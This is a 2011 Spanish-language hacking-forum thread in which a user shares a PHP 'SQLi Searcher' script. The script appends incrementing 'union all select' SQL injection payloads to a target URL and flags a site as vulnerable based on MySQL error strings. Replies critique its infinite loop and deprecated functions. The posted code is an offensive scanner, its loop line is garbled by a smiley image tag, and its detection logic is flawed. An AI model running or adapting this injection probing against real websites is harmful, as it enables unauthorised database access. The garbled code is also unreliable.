[Código-PHP] SQLi Searcher V1 - JaAViEr

  • 4 Respuestas
  • 2695 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado JaAViEr

  • *
  • Underc0der
  • Mensajes: 163
  • Actividad:
    0%
  • Reputación 0
  • http://codigo.ga
    • Ver Perfil
    • Blog de Programación :: Python

[Código-PHP] SQLi Searcher V1 - JaAViEr

  • en: Junio 04, 2011, 11:46:12 pm
Luego de hacerlo en Python -> SQLi Searcher Python
Traigo la versión PHP para quienes no tenga Python :P
Código: PHP
  1. <form action=? method=post>
  2. URL:<input name=url><br/>
  3. <input type=SUBMIT><br />
  4. <?php
  5. $url=$_REQUEST['url'];
  6. if($url==NULL){exit;}
  7. $temp="-1+union+all+select+";$i=1;
  8. for(;<img src="https://underc0de.org/foro/Smileys/default/wink.gif" alt=";&#41;" title="Guiñar" class="smiley" />{
  9. $temp.="$i,";
  10. $injection=substr($temp,0,-1);
  11. $c=file_get_contents("$url$injection");
  12. if(!eregi("The used SELECT",$c) || !eregi("mysql_fetch",$c)){
  13. echo "Injection encontrada  <a href=$url$injection>VER !</a><br /><br />";
  14. }
  15. $i++;
  16. }
  17. ?>
  18.  
Saludos UnderC0de ;)
« Última modificación: Marzo 22, 2014, 02:18:29 pm por Expermicid »

Desconectado ~ Yoya ~

  • *
  • Underc0der
  • Mensajes: 153
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email

Re:[Código-PHP]SQLi Searcher V1 - JaAViEr

  • en: Junio 05, 2011, 11:15:20 am
Buenas @JaAVIEr, no es por nada pero tienes que agregarle mas ganas.

Solo tiene dos formas para detectar que es una vulnerable a SQLI y eso que muchas veces no dan errores.
Si no detecta SQLI, se ejecuta un bucle infinito que al final te estas auto-dosseando.

Tambien estas utilizando funciones obsoletas como eregi() y el código se puede optimizar mucho mas.

Tienes que tratar de optimizar los códigos, principalmente lo que están dentro de un bucle...
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

Desconectado JaAViEr

  • *
  • Underc0der
  • Mensajes: 163
  • Actividad:
    0%
  • Reputación 0
  • http://codigo.ga
    • Ver Perfil
    • Blog de Programación :: Python

Re:[Código-PHP]SQLi Searcher V1 - JaAViEr

  • en: Junio 05, 2011, 05:29:40 pm
Buenas @JaAVIEr, no es por nada pero tienes que agregarle mas ganas.

Solo tiene dos formas para detectar que es una vulnerable a SQLI y eso que muchas veces no dan errores.
Si no detecta SQLI, se ejecuta un bucle infinito que al final te estas auto-dosseando.

Tambien estas utilizando funciones obsoletas como eregi() y el código se puede optimizar mucho mas.

Tienes que tratar de optimizar los códigos, principalmente lo que están dentro de un bucle...
Thanks you.
Sobre el eregi() lo usé porque otros como stristr y esas madres no me ayudaban mucho :-\
Ya sabía que lidiaba con algo "obsoleto"

Desconectado ~ Yoya ~

  • *
  • Underc0der
  • Mensajes: 153
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email

Re:[Código-PHP]SQLi Searcher V1 - JaAViEr

  • en: Junio 05, 2011, 05:59:05 pm
No pasa nada, puedes sustituir eregi() por strpos o usar preg_match.

Saludos y espero ver el source mejorado.

Pd: Recuerda que una herramienta no es buena por la cantidad de lenguaje que esta programada.
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

Desconectado JaAViEr

  • *
  • Underc0der
  • Mensajes: 163
  • Actividad:
    0%
  • Reputación 0
  • http://codigo.ga
    • Ver Perfil
    • Blog de Programación :: Python

Re:[Código-PHP]SQLi Searcher V1 - JaAViEr

  • en: Junio 05, 2011, 06:30:48 pm
No pasa nada, puedes sustituir eregi() por strpos o usar preg_match.

Saludos y espero ver el source mejorado.

Pd: Recuerda que una herramienta no es buena por la cantidad de lenguaje que esta programada.
Claro, si te refieres a que está en Python.
No lo hago para que sea mejor, lo hago para que haya diversidad de posibilidades.
PHP es más accesible que Python , pues lo puedes ejecutar desde una web.

 

[Código PHP] Pequeña "Api" de verificación de email

Iniciado por HckDrk

Respuestas: 0
Vistas: 3402
Último mensaje Diciembre 03, 2017, 02:06:46 pm
por HckDrk
[Codigo fuente] Completo sistema de agencia inmobiliaria/arrendamiento en php

Iniciado por graphixx

Respuestas: 1
Vistas: 6074
Último mensaje Agosto 19, 2014, 09:09:42 am
por blackdrake
Script Clon de Youtube – Diseño 2012 – Codigo Abierto

Iniciado por zCronis

Respuestas: 1
Vistas: 3799
Último mensaje Marzo 06, 2013, 06:12:05 pm
por MAX_POWER
[DESCARGA DIRECTA] SISTEMA POS PRISMA + CODIGO FUENTE

Iniciado por graphixx

Respuestas: 3
Vistas: 5326
Último mensaje Septiembre 03, 2014, 07:25:52 pm
por graphixx
[CÓDIGO FUENTE. Ejemplo] Sistema de sorteos y boletas

Iniciado por graphixx

Respuestas: 0
Vistas: 4653
Último mensaje Marzo 04, 2018, 10:53:04 pm
por graphixx